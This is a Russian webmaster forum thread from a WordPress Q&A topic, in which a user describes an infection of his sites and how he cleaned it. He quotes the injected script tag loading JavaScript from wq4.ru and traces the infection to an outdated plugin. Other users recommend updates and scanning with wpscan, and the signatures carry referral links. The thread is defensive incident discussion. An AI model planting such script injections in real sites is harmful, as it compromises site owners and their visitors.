Проверьте свой сайт. Подпишитесь на 899258 - Веб-строительство

Спрашиваем и отвечаем по Wordpress-9

SeVlad · 2021-07-07T08:59:26.0000000Z

Продолжаем задавать и получать ответы на вопросы по одной из самой популярной ныне CMS - Wordpress. Часть 1 , часть 2 , часть 3 , часть 4 , часть 5 , часть 6 , часть 7 , часть 8 . Всем, кто только начинает работать с ВП рекомендую ознакомиться со статьей Новичкам С чего начать . Здесь вы получите ответы на вопросы типа что нужно перед установкой WordPress , как установить WordPress и что делать дальше . А вообще в этой статье имеется масса ссылок, которые будут полезны не только новичкам. Рекомендую всем. Кроме того, вполне возможно, что на вопрос, который вы хотите задать - вы найдете ответ быстрее, чем напишете в топик ;) Несколько замечаний перед созданием поста в топике . Их соблюдение может помочь быстрее и качественнее получить ответ. Прежде, чем задать вопрос типа как из ссылок вида "/?p=123" сделать "/nazvanie-posta/" загляните в админку ВП и хотя бы посмотрите на все пункты. Уверяю вас - пока вы не нажмёте "сохранить" - ничего не измениться. Исключение : изменение положения и состава виджетов в сайдбаре. Это топик по Wordpress . По СЕО, HTML, CSS, JS, общих вопросов безопасности и тп пожалуйста , спрашивайте в соответствующих темах и разделах сёрча. Формат топика: задал вопрос-получил ответ (опц. -нажал "спасибо" ;) ). Если Ваш вопрос предполагает более-менее продолжительное обсуждение - имеет смысл создать отдельный топик. Так обсуждение будет больше на виду, не потеряется в череде других вопросов и вы не помешаете другим участникам найти ответы на свои вопросы. Не нужно "спасибных" постов (где только "спасибо", без вопросов и\или описаний решений и тп) - для этого есть кнопка. Плз, не захламляете топик пустышками. [new] Для показа небольших участков кода используйте bb-код [code ][/ code] . Большие простыни помещайте на http://pastebin.com , http://jsfiddle.net/ и тп сервисы. Необходимый минимум , который должен знать и уметь админ ВП (и вообще сайтостроитель): * Термины - рубрики, записи (посты), страницы, сайбар, виджеты, метки\теги, бекап и тд. Не просто знать названия, а понимать их сущность и назначение. * HTML - базовый уровень (изучить десяток тегов типа <p> или <img> - не велика проблема). * Посмотреть исходный код страницы в браузере. * Пользоваться поисковыми системами. А так же настоятельно рекомендую забыть про виндовый блокнот и править файлы в правильных блокнотах: AkelPad , Notepad++ и тп. В кодировке UTF-8 без BOM . Если же вы хотите действительно разобраться с движком (вообще любым, не только ВП) и\или иметь хорошие и посещаемый сайты - вам не обойтись без знаний PHP, знаний безопасности (как сетевой, так и др. даже офлайновой), базовых знаний протоколов передачи, базовых знаний работы серверов и ещё много чего.. На что нужно потратить много времени. (Это не запугивание, нет - это совет-предупреждение) И напоследок полезные ресурсы по ВП: Кодекс - основной документ по устройству и работе ВП. Ру-форумы: Оф. ру-форум , другой русский форум . Блоги: Ю рия Б елотицкого (гуру ВП), WP Magazine (онлайн журнал от некоторых участников разработки ВП), WordPress как на ладони" (ex. "Альтернативный взгляд на WordPress) имеет неофициальную русскоязычную документацию (вольный перевод кодекса) по ВП, различные полезные руководства по ВП на IndySite. Англоязычные Вопросы и Ответы: http://stackoverflow.com/ http://wordpress.stackexchange.com/ Дополнения к ВП: Темы и плагины . Новичкам настоятельно рекомендую брать только тут. Почему и чем грозят помойки см п1 и тут . Ну а тем, кто хочет узнать какие сайты можно делать на ВП смотрите старый (2009г), но в большинстве своём актуальный топик Интересные сайты на ВП (скептики же, могут сразу обратить внимание на часть: " Высоконагруженные и посещаемые сайты на WordPress" ) и того же года пост 10 вещей которые можно сделать на WordPress помимо блоггинга (много трафа!)

213

solomko

4 июля 2015, 08:03

#311

Привет всем.

На большинстве моих сайтов с движком ВП, примерно 90%, появился вот этот вот скрипт

.... В записях, рандомно (не во всех).

Погуглил в сети, на многих сайтах он так же появился недавно, особенно часто он "впихивается" как текст в формы для кода.... Похоже, что это новая атака на движок ВП.

Как побороть эту гадость, никто не сталкивался? Откуда оно грузится?

30% всех моих доходов идут отсюда (http://www.sape.ru/r.d5e628f4c4.php) Когда-то тут была ссылка рефки Рrofit-partner - R.I.P милый друг Поднимаю показатели сайтов, стабильный доход (http://gogetlinks.net/?inv=gypp40)

Спамеры грузят сайт С сайта рассылается спам Странные заходы с поисковиков

1609

SeVlad

4 июля 2015, 08:07

#312

solomko:
Похоже, что это новая атака на движок ВП

Похоже на тему/плагин с помойки/устаревшую/уязвимую. :)

solomko:
Как побороть эту гадость,

Использовать свежие версии всего. Защищать сайт. Читать соседний раздел и закреплённый там топик.

1

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.

213

solomko

4 июля 2015, 12:05

#313

SeVlad:
Похоже на тему/плагин с помойки/устаревшую/уязвимую.

Может быть, просто, в сети уйма других сайтов, у которых этот код появился начиная с 16 мая... Поэтому я и думаю, что это новая атака на ВП. А вот возраст и причины уязвимости мне неизвестны.

Вдруг кому-то пригодится как бороться\убрать код "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Внимание! В БД он отображается как: "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Я не особо большой специалист, но установил, что вирус этот пишется в базы данных. На хостере было пару моих БД, все разные и с разными именами\паролями. Видимо где-то хостер подкачал, что стали известны пароли или я какой-то плагин не обновил.

Вирус имел название PHP:BackDoor-BX [Trj]

Что я сделал:

1) скачал БД, нашел в них код этого вируса (увы, но только код который "вставляется").

2) Параллельно нашелся файл в котором был этот вирус - это был options.php файлик в кешпапке... Хостер вирус не обнаружил, файл был обнаружен ативирусом на компьютере.

3) После замены\удаления кода в БД, я сменил пароли ко всем БД и их имена.

4) Залил очищенные базы данных.

Может, кому-то эта информация поможет.

1

Взлом на DLE... Будет ли индексироваться такая Взломали сайт на DLE

263

Shelton724

4 июля 2015, 13:53

#314

malquem, поиск по тексту через тотал коммандер поможет, сам так адаптировал шаблон на английском языке под наши реалии

82

eiweb

4 июля 2015, 15:38

#315

solomko:

Я не особо большой специалист, но установил, что вирус этот пишется в базы данных. На хостере было пару моих БД, все разные и с разными именами\паролями. Видимо где-то хостер подкачал, что стали известны пароли или я какой-то плагин не обновил.

Хостер здесь явно не причем!!!

Проверьте свой сайт с помощью "wpscan" возможно много интересного про свой сайт узнаете.

Например Ваш логин от админ панели, а вот сбрутить пароль если получится, тогда уже в сторону хостера головой кивать.

1

VPS сервер (https://hosteiweb.com) в Европе и США - от €3.43 /мес. (базовое администрирование)

активный xss на одном Хостер просит пароль, прошу Помогите привязать домен к

213

solomko

4 июля 2015, 18:18

#316

eiweb:
Проверьте свой сайт с помощью "wpscan" возможно много интересного про свой сайт узнаете.
Например Ваш логин от админ панели, а вот сбрутить пароль если получится, тогда уже в сторону хостера головой кивать.

Спасибо, беда в том, что у меня их пачка... Где прорыв не ясно.

437

totamon

4 июля 2015, 18:40

#317

Konceptovskiy, обиженный по жизни?

solomko, связались с WP, беспокойтесь о безопасности, подпишитесь на /ru/forum/899258

и если хотите конкретики, пишите конкретные данные, какие плагины установлены хотя бы, шелл на сайт может разными путями попасть, от вируса на компьютере и украденного доступа фтп, до уязвимости на соседнем аккаунте хостинга, но самое распространенное все-таки уязвимость в ваших скриптах.

solomko:
Может быть, просто, в сети уйма других сайтов, у которых этот код появился начиная с 16 мая... Поэтому я и думаю, что это новая атака на ВП.

просто на сотнях сайтов используются

SeVlad:
тему/плагин с помойки/устаревшую/уязвимую

и SeVlad тут прав, "с 16 мая" это уже не новая атака... это "старая" атака. а то что ей месяц уже говорит об отношении вебмастеров к своим сайтам🍿

1

Домены и хостинг https://8fn.ru/regru | Дедик от 3000р https://8fn.ru/73 | VPS в Москве https://8fn.ru/72 | Лучшие ВПС, ТП огонь, все страны! https://8fn.ru/inferno | ХОСТИНГ №1 РОССИИ https://8fn.ru/beget

Проверить сайт на трой Как определить, откуда у Ломанули? Или... что это

82

eiweb

4 июля 2015, 19:58

#318

solomko:
Спасибо, беда в том, что у меня их пачка... Где прорыв не ясно.

Я же написал проверьте "wpscan" в Kali linux он уже установлен. Запустите и он покажет где брешь.

Вообще WP только на первый взгляд кажется простой и не сложной CMS.

WP, CMS очень капризная и требует постоянного внимания. 1 месяц не уделил должного внимания - держи "леща" 😂

Легко ли определить логин BitCash.ru - Сочный конверт FasVPS: Настройка Backup без

213

solomko

4 июля 2015, 20:19

#319

totamon, спасибо подпишусь.

Да, виноват, сам понимаю, что нужно было обновлять плагины и все остальное. Вирус нашло в плагине под названием "posts-by-tags". Это был очень старый плагин, который я просто не удалял. Время создания папки было 2014 год, июнь. А обновлялась папка 16 мая.

Сложно следить за пачкой сайтов, особенно если пару из них "замороженные" проекты.

---------- Добавлено 04.07.2015 в 23:20 ----------

eiweb, спасибо.

Выплата в марте 2017 Youtube - Вопросы новичков Помогите, пожалуйста, разобраться. Странная

213

solomko

5 июля 2015, 08:11

#320

Вирус вернулся.

Можно каким-то плагином проверить кто и ЧТО пишет в базу данных?

---------- Добавлено 05.07.2015 в 12:30 ----------

Есть какие-то плагины, которые мониторят кто и что пишет в определенный table базы данных?

Что делать, если ваша email-рассылка попала в спам

Дзен реализовал для авторов возможность вывода денег через СПБ

Спрашиваем и отвечаем по Wordpress-9